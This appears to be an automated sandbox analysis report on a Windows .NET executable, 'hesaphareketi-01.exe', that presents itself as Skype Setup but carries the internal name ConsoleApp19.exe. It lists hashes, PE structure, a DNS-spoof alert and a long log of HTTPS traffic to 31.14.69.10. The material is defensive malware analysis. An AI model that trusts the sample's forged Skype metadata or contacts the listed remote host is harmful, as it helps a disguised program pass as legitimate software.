                                                                  Encrypted:false
                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                  Malicious:false
                                                                  Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):4.917728901780082
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:hesaphareketi-01.exe
                                                                  File size:33792
                                                                  MD5:38e162610466dd251d9b377a60f65c11
                                                                  SHA1:2a597d5198230eaafe8d842e76776192ba3e6742
                                                                  SHA256:7eb784edddde0eddd7b21c4907916f0109334a4237a9c2eb917caf8eae81480f
                                                                  SHA512:385a3a4d1592539e64a14a096ab50f86925376cca6cd23dce1f88cf636affce84cd16c8716b68889bc10cb514822adc26bc2aec4cd6b6200fbbee611740994bc
                                                                  SSDEEP:384:J5lchOF7FykxU3HNKiK7GsUeYDEBTGvX1Lokc3OwRM+6ew/QxXZR45XHgNd:XScdFjiIIlLzceQRxpS5wNd
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..6...L.......U... ...`....@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:92b6928a868a82a4

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4055be
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x8A1682B9 [Mon Jun 1 00:24:25 2043 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x55700x4b.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x48e8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x35c40x3600False0.603226273148data6.03656703165IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x60000x48e80x4a00False0.221125422297data3.25573716149IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xc0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x61300x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                  RT_GROUP_ICON0xa3580x14data
                                                                  RT_VERSION0xa36c0x390data
                                                                  RT_MANIFEST0xa6fc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyright(c) 2021 Skype and/or Microsoft
                                                                  Assembly Version8.77.0.97
                                                                  InternalNameConsoleApp19.exe
                                                                  FileVersion8.77.0.97
                                                                  CompanyNameSkype Technologies S.A.
                                                                  LegalTrademarks
                                                                  CommentsSkype Setup
                                                                  ProductNameSkype
                                                                  ProductVersion8.77.0.97
                                                                  FileDescriptionSkype Setup
                                                                  OriginalFilenameConsoleApp19.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  10/14/21-12:21:41.240968UDP254DNS SPOOF query response with TTL of 1 min. and no authority53600758.8.8.8192.168.2.5

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 14, 2021 12:20:57.586350918 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:57.586397886 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:57.586488008 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:57.621642113 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:57.621671915 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:57.740573883 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:57.740772009 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:57.744354963 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:57.744385004 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:57.746998072 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:57.789335012 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.194693089 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.239146948 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.258897066 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.258970022 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.259051085 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.259064913 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.259072065 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.259109020 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.259145021 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.284135103 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.284193039 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.284216881 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.284245014 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.284271002 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.284280062 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.284307957 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.284332037 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.284380913 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.309439898 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.309459925 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.309537888 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.309551001 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.309583902 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.309603930 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.310139894 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.310167074 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.310180902 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.310215950 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.310233116 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.310246944 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.310255051 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.310267925 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.310276985 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.310286045 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.310318947 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.310359001 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.335783005 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.335824013 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.335899115 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.335911989 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.335927010 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.335954905 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.335979939 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.336004972 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336026907 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336133957 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.336143970 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336205959 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336234093 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336270094 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.336277962 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336314917 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.336482048 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336509943 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336604118 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.336630106 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336646080 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.336791039 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336813927 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336879969 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.336899996 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336915970 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337065935 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.337086916 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337096930 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.337110996 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.337121964 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337152958 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337382078 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337543964 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362500906 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362540007 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362637043 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362692118 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362708092 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362739086 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362792015 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362854958 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362894058 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362936974 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362982035 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362993956 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363030910 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363068104 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363142014 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363173962 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363225937 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363239050 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363286018 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363327980 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363379955 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363415003 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363468885 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363482952 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363518000 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363554955 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363629103 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363658905 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363699913 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363750935 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363759995 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363833904 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363881111 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363909960 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363960981 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363970041 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364025116 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364116907 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364144087 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364192963 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364204884 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364243984 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364275932 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364367008 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364398003 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364447117 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364456892 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364500999 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364542007 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364573956 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364604950 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364649057 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364655018 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364713907 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364820957 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364864111 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364898920 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364909887 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364947081 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364978075 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.365401030 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.417768002 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.417804003 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.417896032 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418020964 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418057919 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418078899 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418087006 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418102026 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418178082 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418188095 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418203115 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418239117 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418375969 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418386936 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418401003 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418447018 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418550968 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418560982 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418575048 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418595076 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418709040 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418718100 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418879032 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.419720888 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.420352936 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443557978 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443614006 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443703890 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443764925 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443789959 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443833113 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443851948 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443861961 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443897009 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443903923 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443931103 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443934917 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443972111 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443979979 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443990946 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444010973 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444020033 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444063902 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444071054 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444094896 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444108963 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444113970 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444125891 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444147110 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444180965 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444202900 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444209099 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444220066 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444236040 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444264889 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444278002 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444283009 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444294930 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444320917 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444344044 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444348097 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444449902 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444497108 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444528103 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444552898 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444559097 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444593906 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444721937 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444727898 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444742918 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444763899 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444796085 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444802999 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444818020 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444823027 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444844961 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444892883 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444900036 CEST4434976231.14.69.10192.168.2.5
